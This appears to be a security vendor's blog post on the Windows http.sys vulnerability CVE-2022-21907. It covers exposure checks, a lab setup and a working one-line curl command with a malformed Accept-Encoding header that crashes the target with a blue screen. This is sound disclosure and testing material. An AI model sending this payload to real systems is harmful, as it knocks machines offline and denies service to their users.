CVE-2022-21907: Microsoft Windows HTTP protocol DOS vulnerability

Recently, a CVE for Microsoft Windows HTTP protocol stack was publicly disclosed where a remote, unauthenticated attacker can cause a full compromise of the system. It affects various Windows versions, including the new Windows 11 OS (ARM64 and x64-based systems).

There is a Proof Of Concept (PoC) already available publicly, which shows how this vulnerability can be used to crash (Windows Blue Screen of Death) the system. With a single iteration of the attack, the Windows device will restart and function normally but with continuous attack, this could lead to Denial of Service (DoS) conditions.

Microsoft has recently released patches addressing this vulnerability. You can read here.

Are you vulnerable?

The good thing is there are a few requirements all of which are to be fulfilled for an attacker to be able to exploit this vulnerability:

• http.sys (the core HTTP engine for Windows) used by services like Microsoft Internet information Services (IIS) and others, needs to run on the machine. You can check if any such service is installed on your machine by running the following command in PowerShell / CMD prompt: netsh http show servicestate.
  If you have such a service running, you will see some entries similar to the following image, and then check for the next requirement.\
• 
• HTTP Trailer Support via EnableTrailerSupport (you can find more information on trailers here) registry value needs to be enabled and set to a value other than 0. Presence of this registry value can be checked and remedied by running PowerShell one-liners mentioned here.\
• 

Attack in action

Configuring the target

• We need to have a Windows machine that is vulnerable. We tested ours on a Virtual machine having Windows 10 21H1 Build 19043.
• Now, we need a service which uses the http.sys program for example IIS. Download IIS from here and install it.
• To activate IIS, select Control Panel > Program & Features > Turn Windows Features On or Off > Check IIS, and then select the World Wide Web Services check box. Select OK to activate IIS.\
• 
• \
• Open the Registry Editor. Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters and add a new registry value (Refer to second figure) to Parameters, with the name ‘EnableTrailerSupport’ and modify its value to ‘dword:00000001.’
• The machine is now configured to be vulnerable to CVE-2022-21907.

Attacking the target

• From a different machine (Ubuntu 18 in our case) on the same network, send an HTTP request by using curl (a tool that is used for sending requests) (accept encoding value taken from the POC) to our vulnerable Windows machine. Replace the $WINDOWS_IP with the IP address of the target machine.
  • curl $WINDOWS_IP:80 -sH "Accept-encoding: AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************, *, ,"
  • To see the actual HTTP request that is sent, set up a traffic capturing tool like Wireshark. The following image shows the request as captured by Wireshark. The malicious Accept-encoding header value is clearly seen.\
  • 
• Observe the Windows Blue Screen of Death (BSoD), which means that our attack was successful.

Accept-Encoding Value

On experimenting with the accept-encoding value multiple times, we have observed that, the minimal Accept-Encoding value that has been able to trigger the vulnerability has the following values (both are needed):

• At least one unknown/invalid encoding value and something random like abbc or abb*c needs to be present.
• At least two empty/spaces filled values needs to be present at the end.
• So, something like the following string would be able to trigger the vulnerability:

Leverage subscription service to stay ahead of attacks

Keysight's Application and Threat Intelligence (ATI) Subscription provides daily malware and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Center continuously monitors threats as they appear in the wild and has just released a strike for this CVE as part of BreakingPoint System’s recent update 2022-02. More information is present here.

The strike includes many variations of the attack, which the attackers might use against your network.

Customers of BreakingPoint now have access to attack campaigns for different advanced persistent threats, allowing them to test their currently deployed security controls’ ability to detect or block such attacks. For more details, see BreakingPoint.

References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907\ • https://isc.sans.edu/diary/A+Quick+CVE-2022-21907+FAQ/28234\ • https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907\ • https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907\ • https://github.com/antx-code/CVE-2022-21907\ • https://isc.sans.edu/diary/A+Quick+CVE-2022-21907+FAQ/28234

Related Posts